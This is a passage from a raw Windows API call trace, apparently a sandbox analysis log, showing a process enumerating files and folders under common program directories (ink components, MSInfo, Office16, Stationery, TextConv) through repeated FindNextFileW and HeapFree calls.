hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0178.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.555] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="symbols.xml", cAlternateFileName="")) returned 1 [0178.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.555] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf9a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-IL", cAlternateFileName="")) returned 1 [0178.555] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.556] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cfce2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0178.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.556] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0178.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.556] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe382bd1f, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe382bd1f, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0178.556] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.556] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c57278, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb269cdea, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb269cdea, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x79bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0178.557] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.557] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0178.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.558] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a7a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0178.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.558] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076afd8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LanguageModel", cAlternateFileName="LANGUA~1")) returned 1 [0178.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.558] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076b52b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0178.558] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.559] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076ba6e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0178.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.559] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a4376e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1f30e81, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1f30e81, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x19f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0178.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.559] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076c75d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0178.559] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.560] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d57c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0178.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.560] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0178.560] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.560] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0178.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.561] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0178.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.561] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0178.561] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.561] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0178.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.562] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0178.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.562] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0178.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.562] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c820e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0178.562] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.562] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0178.563] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.563] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x0, dwReserved1=0x0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0178.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.564] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0178.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.564] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c93df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0178.564] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.844] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0178.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0178.845] FindNextFileW (in: hFindFile=0x43a2e58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0178.845] FindClose (in: hFindFile=0x43a2e58 | out: hFindFile=0x43a2e58) returned 1 [0178.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0178.845] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa098a4c6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71143a45, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSInfo", cAlternateFileName="")) returned 1 [0178.845] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.846] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463aec8d, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x63793f1, ftLastAccessTime.dwHighDateTime=0x1d2fa0a, ftLastWriteTime.dwLowDateTime=0x463aec8d, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x5a600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0178.846] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.846] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9f60362, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OFFICE16", cAlternateFileName="")) returned 1 [0178.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.848] FindNextFileW (in: hFindFile=0x43a2f58, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 0 [0178.848] FindClose (in: hFindFile=0x43a2f58 | out: hFindFile=0x43a2f58) returned 1 [0178.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.848] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0178.848] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.848] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0178.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.849] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b5538f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0178.849] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.849] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b56882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TextConv", cAlternateFileName="")) returned 1 [0178.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44250b0 | out: hHeap=0x680000) returned 1 [0178.850] FindNextFileW (in: hFindFile=0x43a2c18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b5787e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0178.850] FindClose (in: hFindFile=0x43a2c18 | out: hFindFile=0x43a2c18) returned 1 [0178.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0178.850] FindNextFileW (in: hFindFile=0x43a2ad8, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b57d42, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Triedit", cAlternateFileName="")) returned 1 [0178.850] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 